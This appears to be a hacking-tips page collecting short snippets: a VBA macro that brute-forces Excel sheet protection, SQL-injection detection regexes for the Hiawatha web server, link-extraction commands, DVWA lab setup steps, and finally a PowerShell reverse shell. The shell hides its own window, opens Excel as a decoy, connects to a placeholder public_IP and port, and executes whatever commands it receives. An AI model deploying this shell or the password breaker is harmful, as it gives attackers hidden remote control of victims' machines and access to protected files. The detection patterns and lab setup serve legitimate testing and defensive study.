Decrypt Excel Password

Put this code into VB, and run…

Sub PasswordBreaker()
 Dim i As Integer, j As Integer, k As Integer
 Dim l As Integer, m As Integer, n As Integer
 Dim i1 As Integer, i2 As Integer, i3 As Integer
 Dim i4 As Integer, i5 As Integer, i6 As Integer
 On Error Resume Next
 For i = 65 To 66: For j = 65 To 66: For k = 65 To 66
 For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66
 For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66
 For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126
 ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
 Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
 Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
 If ActiveSheet.ProtectContents = False Then
 MsgBox "One usable password is " & Chr(i) & Chr(j) & _
 Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _
 Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
 Exit Sub
 End If
 Next: Next: Next: Next: Next: Next
 Next: Next: Next: Next: Next: Next
End Sub

Hiawatha webserver PreventSQLi Patterns

'\s*--(\s|')
'\s*(and|or|xor|&&|\|\|)\s*\(?\s*('|[0-9]|`?[a-z\._-]+`?\s*(=|like)|[a-z]+\s*\()
'\s*(not\s+)?in\s*\(\s*['0-9]
union(\s+all)?(\s*\(\s*|\s+)select(`|\s)
select(\s*`|\s+)(\*|[a-z0-9_\, ]*)(`\s*|\s+)from(\s*`|\s+)[a-z0-9_\.]*
insert\s+into(\s*`|\s+).*(`\s*|\s+)(values\s*)?\(.*\)
update(\s*`|\s+)[a-z0-9_\.]*(`\s*|\s+)set(\s*`|\s+).*=
delete\s+from(\s*`|\s+)[a-z0-9_\.]*`?

Extract Links from a Web Page

Command Line

Extracting links from a page can be done with a number of open source command line tools. lynx a text based browser is perhaps the simplest.

lynx -listonly -dump url.example.com

API for the Extract Links Tool

Another option for accessing the extract links tool is to use the API. Rather than using the above form you can make a direct link to the following resource with the parameter of ?q set to the address you wish to extract links from.

https://api.hackertarget.com/pagelinks/?q=websitetotest.com

How To Setup DVWA Using Windows XAMPP

Download and install XAMPP on your computer.

Download DVWA, then extract the zip file to the htdocs folder.

In \xampp\htdocs\dvwa\config directory rename config.inc.php.dist to config.inc.php, and search line

$_DVWA[ 'db_password' ] = 'p@ssw0rd';

and change to (empty password).

Edit \xampp\php\php.ini file, search line

allow_url_include=Off

and change to On.

Then open the XAMPP control panel and start “Apache” and “MySQL” service.

Open the web browser, then go 127.0.0.1/DVWA. Click on “Create/Reset Database” button in browser…

Go!

Powershell reverse shell example code

Add-Type -Name win -MemberDefinition ‘[DllImport(“user32.dll”)] public static extern bool ShowWindow(int handle, int state);’ -Namespace native
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle,0)
Invoke-Item “C:\Program Files\Microsoft Office\Office15\excel.exe”
Set-Location c:\windows\system32
$client = New-Object System.Net.Sockets.TCPClient(“public_IP”,public_port);
$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()

Of’course change the public_IP and public_port variable, and Invoke-Item application path!